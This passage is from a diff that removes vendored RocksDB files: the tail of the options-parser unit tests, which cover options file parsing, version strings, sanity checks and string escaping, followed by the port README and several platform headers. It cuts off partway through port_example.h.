-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[Version]\n"
-      "  rocksdb_version=3.14.0\n"
-      "  options_file_version=1\n"
-      "[DBOptions]\n"
-      "  max_open_files=12345\n"
-      "  max_background_flushes=301\n"
-      "  max_total_wal_size=1024  # keep_log_file_num=1000\n"
-      "[CFOptions \"something_else\"]\n"
-      "  # if a section is blank, we will use the default\n";
-
-  const std::string kTestFileName = "test-rocksdb-options.ini";
-  env_->WriteToNewFile(kTestFileName, options_file_content);
-  RocksDBOptionsParser parser;
-  ASSERT_NOK(parser.Parse(kTestFileName, env_.get()));
-}
-
-TEST_F(OptionsParserTest, DefaultCFOptionsMustBeTheFirst) {
-  DBOptions db_opt;
-  db_opt.max_open_files = 12345;
-  db_opt.max_background_flushes = 301;
-  db_opt.max_total_wal_size = 1024;
-  ColumnFamilyOptions cf_opt;
-
-  std::string options_file_content =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[Version]\n"
-      "  rocksdb_version=3.14.0\n"
-      "  options_file_version=1\n"
-      "[DBOptions]\n"
-      "  max_open_files=12345\n"
-      "  max_background_flushes=301\n"
-      "  max_total_wal_size=1024  # keep_log_file_num=1000\n"
-      "[CFOptions \"something_else\"]\n"
-      "  # if a section is blank, we will use the default\n"
-      "[CFOptions \"default\"]\n"
-      "  # if a section is blank, we will use the default\n";
-
-  const std::string kTestFileName = "test-rocksdb-options.ini";
-  env_->WriteToNewFile(kTestFileName, options_file_content);
-  RocksDBOptionsParser parser;
-  ASSERT_NOK(parser.Parse(kTestFileName, env_.get()));
-}
-
-TEST_F(OptionsParserTest, DuplicateCFOptions) {
-  DBOptions db_opt;
-  db_opt.max_open_files = 12345;
-  db_opt.max_background_flushes = 301;
-  db_opt.max_total_wal_size = 1024;
-  ColumnFamilyOptions cf_opt;
-
-  std::string options_file_content =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[Version]\n"
-      "  rocksdb_version=3.14.0\n"
-      "  options_file_version=1\n"
-      "[DBOptions]\n"
-      "  max_open_files=12345\n"
-      "  max_background_flushes=301\n"
-      "  max_total_wal_size=1024  # keep_log_file_num=1000\n"
-      "[CFOptions \"default\"]\n"
-      "[CFOptions \"something_else\"]\n"
-      "[CFOptions \"something_else\"]\n";
-
-  const std::string kTestFileName = "test-rocksdb-options.ini";
-  env_->WriteToNewFile(kTestFileName, options_file_content);
-  RocksDBOptionsParser parser;
-  ASSERT_NOK(parser.Parse(kTestFileName, env_.get()));
-}
-
-TEST_F(OptionsParserTest, IgnoreUnknownOptions) {
-  DBOptions db_opt;
-  db_opt.max_open_files = 12345;
-  db_opt.max_background_flushes = 301;
-  db_opt.max_total_wal_size = 1024;
-  ColumnFamilyOptions cf_opt;
-
-  std::string options_file_content =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[Version]\n"
-      "  rocksdb_version=3.14.0\n"
-      "  options_file_version=1\n"
-      "[DBOptions]\n"
-      "  max_open_files=12345\n"
-      "  max_background_flushes=301\n"
-      "  max_total_wal_size=1024  # keep_log_file_num=1000\n"
-      "  unknown_db_option1=321\n"
-      "  unknown_db_option2=false\n"
-      "[CFOptions \"default\"]\n"
-      "  unknown_cf_option1=hello\n"
-      "[CFOptions \"something_else\"]\n"
-      "  unknown_cf_option2=world\n"
-      "  # if a section is blank, we will use the default\n";
-
-  const std::string kTestFileName = "test-rocksdb-options.ini";
-  env_->WriteToNewFile(kTestFileName, options_file_content);
-  RocksDBOptionsParser parser;
-  ASSERT_NOK(parser.Parse(kTestFileName, env_.get()));
-  ASSERT_OK(parser.Parse(kTestFileName, env_.get(),
-                         true /* ignore_unknown_options */));
-}
-
-TEST_F(OptionsParserTest, ParseVersion) {
-  DBOptions db_opt;
-  db_opt.max_open_files = 12345;
-  db_opt.max_background_flushes = 301;
-  db_opt.max_total_wal_size = 1024;
-  ColumnFamilyOptions cf_opt;
-
-  std::string file_template =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[Version]\n"
-      "  rocksdb_version=3.13.1\n"
-      "  options_file_version=%s\n"
-      "[DBOptions]\n"
-      "[CFOptions \"default\"]\n";
-  const int kLength = 1000;
-  char buffer[kLength];
-  RocksDBOptionsParser parser;
-
-  const std::vector<std::string> invalid_versions = {
-      "a.b.c", "3.2.2b", "3.-12", "3. 1",  // only digits and dots are allowed
-      "1.2.3.4",
-      "1.2.3"  // can only contains at most one dot.
-      "0",     // options_file_version must be at least one
-      "3..2",
-      ".", ".1.2",             // must have at least one digit before each dot
-      "1.2.", "1.", "2.34."};  // must have at least one digit after each dot
-  for (auto iv : invalid_versions) {
-    snprintf(buffer, kLength - 1, file_template.c_str(), iv.c_str());
-
-    parser.Reset();
-    env_->WriteToNewFile(iv, buffer);
-    ASSERT_NOK(parser.Parse(iv, env_.get()));
-  }
-
-  const std::vector<std::string> valid_versions = {
-      "1.232", "100", "3.12", "1", "12.3  ", "  1.25  "};
-  for (auto vv : valid_versions) {
-    snprintf(buffer, kLength - 1, file_template.c_str(), vv.c_str());
-    parser.Reset();
-    env_->WriteToNewFile(vv, buffer);
-    ASSERT_OK(parser.Parse(vv, env_.get()));
-  }
-}
-
-void VerifyCFPointerTypedOptions(
-    ColumnFamilyOptions* base_cf_opt, const ColumnFamilyOptions* new_cf_opt,
-    const std::unordered_map<std::string, std::string>* new_cf_opt_map) {
-  std::string name_buffer;
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(*base_cf_opt, *new_cf_opt,
-                                                  new_cf_opt_map));
-
-  // change the name of merge operator back-and-forth
-  {
-    auto* merge_operator = dynamic_cast<test::ChanglingMergeOperator*>(
-        base_cf_opt->merge_operator.get());
-    if (merge_operator != nullptr) {
-      name_buffer = merge_operator->Name();
-      // change the name  and expect non-ok status
-      merge_operator->SetName("some-other-name");
-      ASSERT_NOK(RocksDBOptionsParser::VerifyCFOptions(
-          *base_cf_opt, *new_cf_opt, new_cf_opt_map));
-      // change the name back and expect ok status
-      merge_operator->SetName(name_buffer);
-      ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(*base_cf_opt, *new_cf_opt,
-                                                      new_cf_opt_map));
-    }
-  }
-
-  // change the name of the compaction filter factory back-and-forth
-  {
-    auto* compaction_filter_factory =
-        dynamic_cast<test::ChanglingCompactionFilterFactory*>(
-            base_cf_opt->compaction_filter_factory.get());
-    if (compaction_filter_factory != nullptr) {
-      name_buffer = compaction_filter_factory->Name();
-      // change the name and expect non-ok status
-      compaction_filter_factory->SetName("some-other-name");
-      ASSERT_NOK(RocksDBOptionsParser::VerifyCFOptions(
-          *base_cf_opt, *new_cf_opt, new_cf_opt_map));
-      // change the name back and expect ok status
-      compaction_filter_factory->SetName(name_buffer);
-      ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(*base_cf_opt, *new_cf_opt,
-                                                      new_cf_opt_map));
-    }
-  }
-
-  // test by setting compaction_filter to nullptr
-  {
-    auto* tmp_compaction_filter = base_cf_opt->compaction_filter;
-    if (tmp_compaction_filter != nullptr) {
-      base_cf_opt->compaction_filter = nullptr;
-      // set compaction_filter to nullptr and expect non-ok status
-      ASSERT_NOK(RocksDBOptionsParser::VerifyCFOptions(
-          *base_cf_opt, *new_cf_opt, new_cf_opt_map));
-      // set the value back and expect ok status
-      base_cf_opt->compaction_filter = tmp_compaction_filter;
-      ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(*base_cf_opt, *new_cf_opt,
-                                                      new_cf_opt_map));
-    }
-  }
-
-  // test by setting table_factory to nullptr
-  {
-    auto tmp_table_factory = base_cf_opt->table_factory;
-    if (tmp_table_factory != nullptr) {
-      base_cf_opt->table_factory.reset();
-      // set table_factory to nullptr and expect non-ok status
-      ASSERT_NOK(RocksDBOptionsParser::VerifyCFOptions(
-          *base_cf_opt, *new_cf_opt, new_cf_opt_map));
-      // set the value back and expect ok status
-      base_cf_opt->table_factory = tmp_table_factory;
-      ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(*base_cf_opt, *new_cf_opt,
-                                                      new_cf_opt_map));
-    }
-  }
-
-  // test by setting memtable_factory to nullptr
-  {
-    auto tmp_memtable_factory = base_cf_opt->memtable_factory;
-    if (tmp_memtable_factory != nullptr) {
-      base_cf_opt->memtable_factory.reset();
-      // set memtable_factory to nullptr and expect non-ok status
-      ASSERT_NOK(RocksDBOptionsParser::VerifyCFOptions(
-          *base_cf_opt, *new_cf_opt, new_cf_opt_map));
-      // set the value back and expect ok status
-      base_cf_opt->memtable_factory = tmp_memtable_factory;
-      ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(*base_cf_opt, *new_cf_opt,
-                                                      new_cf_opt_map));
-    }
-  }
-}
-
-TEST_F(OptionsParserTest, DumpAndParse) {
-  DBOptions base_db_opt;
-  std::vector<ColumnFamilyOptions> base_cf_opts;
-  std::vector<std::string> cf_names = {"default", "cf1", "cf2", "cf3",
-                                       "c:f:4:4:4"
-                                       "p\\i\\k\\a\\chu\\\\\\",
-                                       "###rocksdb#1-testcf#2###"};
-  const int num_cf = static_cast<int>(cf_names.size());
-  Random rnd(302);
-  test::RandomInitDBOptions(&base_db_opt, &rnd);
-  base_db_opt.db_log_dir += "/#odd #but #could #happen #path #/\\\\#OMG";
-
-  BlockBasedTableOptions special_bbto;
-  special_bbto.cache_index_and_filter_blocks = true;
-  special_bbto.block_size = 999999;
-
-  for (int c = 0; c < num_cf; ++c) {
-    ColumnFamilyOptions cf_opt;
-    Random cf_rnd(0xFB + c);
-    test::RandomInitCFOptions(&cf_opt, &cf_rnd);
-    if (c < 4) {
-      cf_opt.prefix_extractor.reset(test::RandomSliceTransform(&rnd, c));
-    }
-    if (c < 3) {
-      cf_opt.table_factory.reset(test::RandomTableFactory(&rnd, c));
-    } else if (c == 4) {
-      cf_opt.table_factory.reset(NewBlockBasedTableFactory(special_bbto));
-    }
-    base_cf_opts.emplace_back(cf_opt);
-  }
-
-  const std::string kOptionsFileName = "test-persisted-options.ini";
-  ASSERT_OK(PersistRocksDBOptions(base_db_opt, cf_names, base_cf_opts,
-                                  kOptionsFileName, env_.get()));
-
-  RocksDBOptionsParser parser;
-  ASSERT_OK(parser.Parse(kOptionsFileName, env_.get()));
-
-  // Make sure block-based table factory options was deserialized correctly
-  std::shared_ptr<TableFactory> ttf = (*parser.cf_opts())[4].table_factory;
-  ASSERT_EQ(BlockBasedTableFactory::kName, std::string(ttf->Name()));
-  const BlockBasedTableOptions& parsed_bbto =
-      static_cast<BlockBasedTableFactory*>(ttf.get())->table_options();
-  ASSERT_EQ(special_bbto.block_size, parsed_bbto.block_size);
-  ASSERT_EQ(special_bbto.cache_index_and_filter_blocks,
-            parsed_bbto.cache_index_and_filter_blocks);
-
-  ASSERT_OK(RocksDBOptionsParser::VerifyRocksDBOptionsFromFile(
-      base_db_opt, cf_names, base_cf_opts, kOptionsFileName, env_.get()));
-
-  ASSERT_OK(
-      RocksDBOptionsParser::VerifyDBOptions(*parser.db_opt(), base_db_opt));
-  for (int c = 0; c < num_cf; ++c) {
-    const auto* cf_opt = parser.GetCFOptions(cf_names[c]);
-    ASSERT_NE(cf_opt, nullptr);
-    ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(
-        base_cf_opts[c], *cf_opt, &(parser.cf_opt_maps()->at(c))));
-  }
-
-  // Further verify pointer-typed options
-  for (int c = 0; c < num_cf; ++c) {
-    const auto* cf_opt = parser.GetCFOptions(cf_names[c]);
-    ASSERT_NE(cf_opt, nullptr);
-    VerifyCFPointerTypedOptions(&base_cf_opts[c], cf_opt,
-                                &(parser.cf_opt_maps()->at(c)));
-  }
-
-  ASSERT_EQ(parser.GetCFOptions("does not exist"), nullptr);
-
-  base_db_opt.max_open_files++;
-  ASSERT_NOK(RocksDBOptionsParser::VerifyRocksDBOptionsFromFile(
-      base_db_opt, cf_names, base_cf_opts, kOptionsFileName, env_.get()));
-
-  for (int c = 0; c < num_cf; ++c) {
-    if (base_cf_opts[c].compaction_filter) {
-      delete base_cf_opts[c].compaction_filter;
-    }
-  }
-}
-
-TEST_F(OptionsParserTest, DifferentDefault) {
-  const std::string kOptionsFileName = "test-persisted-options.ini";
-
-  ColumnFamilyOptions cf_level_opts;
-  cf_level_opts.OptimizeLevelStyleCompaction();
-
-  ColumnFamilyOptions cf_univ_opts;
-  cf_univ_opts.OptimizeUniversalStyleCompaction();
-
-  ASSERT_OK(PersistRocksDBOptions(DBOptions(), {"default", "universal"},
-                                  {cf_level_opts, cf_univ_opts},
-                                  kOptionsFileName, env_.get()));
-
-  RocksDBOptionsParser parser;
-  ASSERT_OK(parser.Parse(kOptionsFileName, env_.get()));
-
-  {
-    Options old_default_opts;
-    old_default_opts.OldDefaults();
-    ASSERT_EQ(10 * 1048576, old_default_opts.max_bytes_for_level_base);
-    ASSERT_EQ(5000, old_default_opts.max_open_files);
-    ASSERT_EQ(2 * 1024U * 1024U, old_default_opts.delayed_write_rate);
-    ASSERT_EQ(WALRecoveryMode::kTolerateCorruptedTailRecords,
-              old_default_opts.wal_recovery_mode);
-  }
-  {
-    Options old_default_opts;
-    old_default_opts.OldDefaults(4, 6);
-    ASSERT_EQ(10 * 1048576, old_default_opts.max_bytes_for_level_base);
-    ASSERT_EQ(5000, old_default_opts.max_open_files);
-  }
-  {
-    Options old_default_opts;
-    old_default_opts.OldDefaults(4, 7);
-    ASSERT_NE(10 * 1048576, old_default_opts.max_bytes_for_level_base);
-    ASSERT_NE(4, old_default_opts.table_cache_numshardbits);
-    ASSERT_EQ(5000, old_default_opts.max_open_files);
-    ASSERT_EQ(2 * 1024U * 1024U, old_default_opts.delayed_write_rate);
-  }
-  {
-    ColumnFamilyOptions old_default_cf_opts;
-    old_default_cf_opts.OldDefaults();
-    ASSERT_EQ(2 * 1048576, old_default_cf_opts.target_file_size_base);
-    ASSERT_EQ(4 << 20, old_default_cf_opts.write_buffer_size);
-    ASSERT_EQ(2 * 1048576, old_default_cf_opts.target_file_size_base);
-    ASSERT_EQ(0, old_default_cf_opts.soft_pending_compaction_bytes_limit);
-    ASSERT_EQ(0, old_default_cf_opts.hard_pending_compaction_bytes_limit);
-    ASSERT_EQ(CompactionPri::kByCompensatedSize,
-              old_default_cf_opts.compaction_pri);
-  }
-  {
-    ColumnFamilyOptions old_default_cf_opts;
-    old_default_cf_opts.OldDefaults(4, 6);
-    ASSERT_EQ(2 * 1048576, old_default_cf_opts.target_file_size_base);
-    ASSERT_EQ(CompactionPri::kByCompensatedSize,
-              old_default_cf_opts.compaction_pri);
-  }
-  {
-    ColumnFamilyOptions old_default_cf_opts;
-    old_default_cf_opts.OldDefaults(4, 7);
-    ASSERT_NE(2 * 1048576, old_default_cf_opts.target_file_size_base);
-    ASSERT_EQ(CompactionPri::kByCompensatedSize,
-              old_default_cf_opts.compaction_pri);
-  }
-  {
-    Options old_default_opts;
-    old_default_opts.OldDefaults(5, 1);
-    ASSERT_EQ(2 * 1024U * 1024U, old_default_opts.delayed_write_rate);
-  }
-  {
-    Options old_default_opts;
-    old_default_opts.OldDefaults(5, 2);
-    ASSERT_EQ(16 * 1024U * 1024U, old_default_opts.delayed_write_rate);
-  }
-
-  Options small_opts;
-  small_opts.OptimizeForSmallDb();
-  ASSERT_EQ(2 << 20, small_opts.write_buffer_size);
-  ASSERT_EQ(5000, small_opts.max_open_files);
-}
-
-class OptionsSanityCheckTest : public OptionsParserTest {
- public:
-  OptionsSanityCheckTest() {}
-
- protected:
-  Status SanityCheckCFOptions(const ColumnFamilyOptions& cf_opts,
-                              OptionsSanityCheckLevel level) {
-    return RocksDBOptionsParser::VerifyRocksDBOptionsFromFile(
-        DBOptions(), {"default"}, {cf_opts}, kOptionsFileName, env_.get(),
-        level);
-  }
-
-  Status PersistCFOptions(const ColumnFamilyOptions& cf_opts) {
-    Status s = env_->DeleteFile(kOptionsFileName);
-    if (!s.ok()) {
-      return s;
-    }
-    return PersistRocksDBOptions(DBOptions(), {"default"}, {cf_opts},
-                                 kOptionsFileName, env_.get());
-  }
-
-  const std::string kOptionsFileName = "OPTIONS";
-};
-
-TEST_F(OptionsSanityCheckTest, SanityCheck) {
-  ColumnFamilyOptions opts;
-  Random rnd(301);
-
-  // default ColumnFamilyOptions
-  {
-    ASSERT_OK(PersistCFOptions(opts));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-  }
-
-  // prefix_extractor
-  {
-    // Okay to change prefix_extractor form nullptr to non-nullptr
-    ASSERT_EQ(opts.prefix_extractor.get(), nullptr);
-    opts.prefix_extractor.reset(NewCappedPrefixTransform(10));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelNone));
-
-    // persist the change
-    ASSERT_OK(PersistCFOptions(opts));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-
-    // use same prefix extractor but with different parameter
-    opts.prefix_extractor.reset(NewCappedPrefixTransform(15));
-    // expect pass only in kSanityLevelLooselyCompatible
-    ASSERT_NOK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelNone));
-
-    // repeat the test with FixedPrefixTransform
-    opts.prefix_extractor.reset(NewFixedPrefixTransform(10));
-    ASSERT_NOK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelNone));
-
-    // persist the change of prefix_extractor
-    ASSERT_OK(PersistCFOptions(opts));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-
-    // use same prefix extractor but with different parameter
-    opts.prefix_extractor.reset(NewFixedPrefixTransform(15));
-    // expect pass only in kSanityLevelLooselyCompatible
-    ASSERT_NOK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelNone));
-
-    // Change prefix extractor from non-nullptr to nullptr
-    opts.prefix_extractor.reset();
-    // expect pass as it's safe to change prefix_extractor
-    // from non-null to null
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelNone));
-  }
-  // persist the change
-  ASSERT_OK(PersistCFOptions(opts));
-  ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-
-  // table_factory
-  {
-    for (int tb = 0; tb <= 2; ++tb) {
-      // change the table factory
-      opts.table_factory.reset(test::RandomTableFactory(&rnd, tb));
-      ASSERT_NOK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-      ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelNone));
-
-      // persist the change
-      ASSERT_OK(PersistCFOptions(opts));
-      ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-    }
-  }
-
-  // merge_operator
-  {
-    for (int test = 0; test < 5; ++test) {
-      // change the merge operator
-      opts.merge_operator.reset(test::RandomMergeOperator(&rnd));
-      ASSERT_NOK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-      ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelNone));
-
-      // persist the change
-      ASSERT_OK(PersistCFOptions(opts));
-      ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-    }
-  }
-
-  // compaction_filter
-  {
-    for (int test = 0; test < 5; ++test) {
-      // change the compaction filter
-      opts.compaction_filter = test::RandomCompactionFilter(&rnd);
-      ASSERT_NOK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-      ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-
-      // persist the change
-      ASSERT_OK(PersistCFOptions(opts));
-      ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-      delete opts.compaction_filter;
-      opts.compaction_filter = nullptr;
-    }
-  }
-
-  // compaction_filter_factory
-  {
-    for (int test = 0; test < 5; ++test) {
-      // change the compaction filter factory
-      opts.compaction_filter_factory.reset(
-          test::RandomCompactionFilterFactory(&rnd));
-      ASSERT_NOK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-      ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-
-      // persist the change
-      ASSERT_OK(PersistCFOptions(opts));
-      ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-    }
-  }
-}
-
-namespace {
-bool IsEscapedString(const std::string& str) {
-  for (size_t i = 0; i < str.size(); ++i) {
-    if (str[i] == '\\') {
-      // since we already handle those two consecutive '\'s in
-      // the next if-then branch, any '\' appear at the end
-      // of an escaped string in such case is not valid.
-      if (i == str.size() - 1) {
-        return false;
-      }
-      if (str[i + 1] == '\\') {
-        // if there're two consecutive '\'s, skip the second one.
-        i++;
-        continue;
-      }
-      switch (str[i + 1]) {
-        case ':':
-        case '\\':
-        case '#':
-          continue;
-        default:
-          // if true, '\' together with str[i + 1] is not a valid escape.
-          if (UnescapeChar(str[i + 1]) == str[i + 1]) {
-            return false;
-          }
-      }
-    } else if (isSpecialChar(str[i]) && (i == 0 || str[i - 1] != '\\')) {
-      return false;
-    }
-  }
-  return true;
-}
-}  // namespace
-
-TEST_F(OptionsParserTest, EscapeOptionString) {
-  ASSERT_EQ(UnescapeOptionString(
-                "This is a test string with \\# \\: and \\\\ escape chars."),
-            "This is a test string with # : and \\ escape chars.");
-
-  ASSERT_EQ(
-      EscapeOptionString("This is a test string with # : and \\ escape chars."),
-      "This is a test string with \\# \\: and \\\\ escape chars.");
-
-  std::string readible_chars =
-      "A String like this \"1234567890-=_)(*&^%$#@!ertyuiop[]{POIU"
-      "YTREWQasdfghjkl;':LKJHGFDSAzxcvbnm,.?>"
-      "<MNBVCXZ\\\" should be okay to \\#\\\\\\:\\#\\#\\#\\ "
-      "be serialized and deserialized";
-
-  std::string escaped_string = EscapeOptionString(readible_chars);
-  ASSERT_TRUE(IsEscapedString(escaped_string));
-  // This two transformations should be canceled and should output
-  // the original input.
-  ASSERT_EQ(UnescapeOptionString(escaped_string), readible_chars);
-
-  std::string all_chars;
-  for (unsigned char c = 0;; ++c) {
-    all_chars += c;
-    if (c == 255) {
-      break;
-    }
-  }
-  escaped_string = EscapeOptionString(all_chars);
-  ASSERT_TRUE(IsEscapedString(escaped_string));
-  ASSERT_EQ(UnescapeOptionString(escaped_string), all_chars);
-
-  ASSERT_EQ(RocksDBOptionsParser::TrimAndRemoveComment(
-                "     A simple statement with a comment.  # like this :)"),
-            "A simple statement with a comment.");
-
-  ASSERT_EQ(RocksDBOptionsParser::TrimAndRemoveComment(
-                "Escape \\# and # comment together   ."),
-            "Escape \\# and");
-}
-#endif  // !ROCKSDB_LITE
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-#ifdef GFLAGS
-  ParseCommandLineFlags(&argc, &argv, true);
-#endif  // GFLAGS
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/port/README b/thirdparty/rocksdb/port/README
deleted file mode 100644
index 422563e..0000000
--- a/thirdparty/rocksdb/port/README
+++ /dev/null
@@ -1,10 +0,0 @@
-This directory contains interfaces and implementations that isolate the
-rest of the package from platform details.
-
-Code in the rest of the package includes "port.h" from this directory.
-"port.h" in turn includes a platform specific "port_<platform>.h" file
-that provides the platform specific implementation.
-
-See port_posix.h for an example of what must be provided in a platform
-specific header file.
-
diff --git a/thirdparty/rocksdb/port/dirent.h b/thirdparty/rocksdb/port/dirent.h
deleted file mode 100644
index 7bcc356..0000000
--- a/thirdparty/rocksdb/port/dirent.h
+++ /dev/null
@@ -1,47 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// See port_example.h for documentation for the following types/functions.
-
-#ifndef STORAGE_LEVELDB_PORT_DIRENT_H_
-#define STORAGE_LEVELDB_PORT_DIRENT_H_
-
-#ifdef ROCKSDB_PLATFORM_POSIX
-#include <dirent.h>
-#include <sys/types.h>
-#elif defined(OS_WIN)
-
-namespace rocksdb {
-namespace port {
-
-struct dirent {
-  char d_name[_MAX_PATH]; /* filename */
-};
-
-struct DIR;
-
-DIR* opendir(const char* name);
-
-dirent* readdir(DIR* dirp);
-
-int closedir(DIR* dirp);
-
-}  // namespace port
-
-using port::dirent;
-using port::DIR;
-using port::opendir;
-using port::readdir;
-using port::closedir;
-
-}  // namespace rocksdb
-
-#endif  // OS_WIN
-
-#endif  // STORAGE_LEVELDB_PORT_DIRENT_H_
diff --git a/thirdparty/rocksdb/port/likely.h b/thirdparty/rocksdb/port/likely.h
deleted file mode 100644
index e5ef786..0000000
--- a/thirdparty/rocksdb/port/likely.h
+++ /dev/null
@@ -1,21 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef PORT_LIKELY_H_
-#define PORT_LIKELY_H_
-
-#if defined(__GNUC__) && __GNUC__ >= 4
-#define LIKELY(x)   (__builtin_expect((x), 1))
-#define UNLIKELY(x) (__builtin_expect((x), 0))
-#else
-#define LIKELY(x)   (x)
-#define UNLIKELY(x) (x)
-#endif
-
-#endif  // PORT_LIKELY_H_
diff --git a/thirdparty/rocksdb/port/port.h b/thirdparty/rocksdb/port/port.h
deleted file mode 100644
index 13aa56d..0000000
--- a/thirdparty/rocksdb/port/port.h
+++ /dev/null
@@ -1,21 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <string>
-
-// Include the appropriate platform specific file below.  If you are
-// porting to a new platform, see "port_example.h" for documentation
-// of what the new port_<platform>.h file must provide.
-#if defined(ROCKSDB_PLATFORM_POSIX)
-#include "port/port_posix.h"
-#elif defined(OS_WIN)
-#include "port/win/port_win.h"
-#endif
diff --git a/thirdparty/rocksdb/port/port_example.h b/thirdparty/rocksdb/port/port_example.h
deleted file mode 100644
index 05b3240..0000000
--- a/thirdparty/rocksdb/port/port_example.h
+++ /dev/null
@@ -1,104 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// This file contains the specification, but not the implementations,
-// of the types/operations/etc. that should be defined by a platform
-// specific port_<platform>.h file.  Use this file as a reference for
-// how to port this package to a new platform.
-
-#ifndef STORAGE_LEVELDB_PORT_PORT_EXAMPLE_H_
-#define STORAGE_LEVELDB_PORT_PORT_EXAMPLE_H_
-
-namespace rocksdb {
-namespace port {
-
-// TODO(jorlow): Many of these belong more in the environment class rather than
-//               here. We should try moving them and see if it affects perf.
-
-// The following boolean constant must be true on a little-endian machine
-// and false otherwise.
-static const bool kLittleEndian = true /* or some other expression */;
-
-// ------------------ Threading -------------------
-
-// A Mutex represents an exclusive lock.
-class Mutex {
- public:
-  Mutex();
-  ~Mutex();
-
-  // Lock the mutex.  Waits until other lockers have exited.
-  // Will deadlock if the mutex is already locked by this thread.
-  void Lock();
-
-  // Unlock the mutex.
-  // REQUIRES: This mutex was locked by this thread.
-  void Unlock();
-
-  // Optionally crash if this thread does not hold this mutex.
-  // The implementation must be fast, especially if NDEBUG is
-  // defined.  The implementation is allowed to skip all checks.
-  void AssertHeld();
-};
-
-class CondVar {
- public:
-  explicit CondVar(Mutex* mu);
-  ~CondVar();
-
-  // Atomically release *mu and block on this condition variable until
-  // either a call to SignalAll(), or a call to Signal() that picks
-  // this thread to wakeup.
-  // REQUIRES: this thread holds *mu
-  void Wait();
-
-  // If there are some threads waiting, wake up at least one of them.
-  void Signal();
-
-  // Wake up all waiting threads.
-  void SignallAll();
-};
-
-// Thread-safe initialization.
-// Used as follows:
-//      static port::OnceType init_control = LEVELDB_ONCE_INIT;
-//      static void Initializer() { ... do something ...; }
-//      ...
-//      port::InitOnce(&init_control, &Initializer);
-typedef intptr_t OnceType;
-#define LEVELDB_ONCE_INIT 0
-extern void InitOnce(port::OnceType*, void (*initializer)());
-
-// ------------------ Compression -------------------
-
-// Store the snappy compression of "input[0,input_length-1]" in *output.
-// Returns false if snappy is not supported by this port.
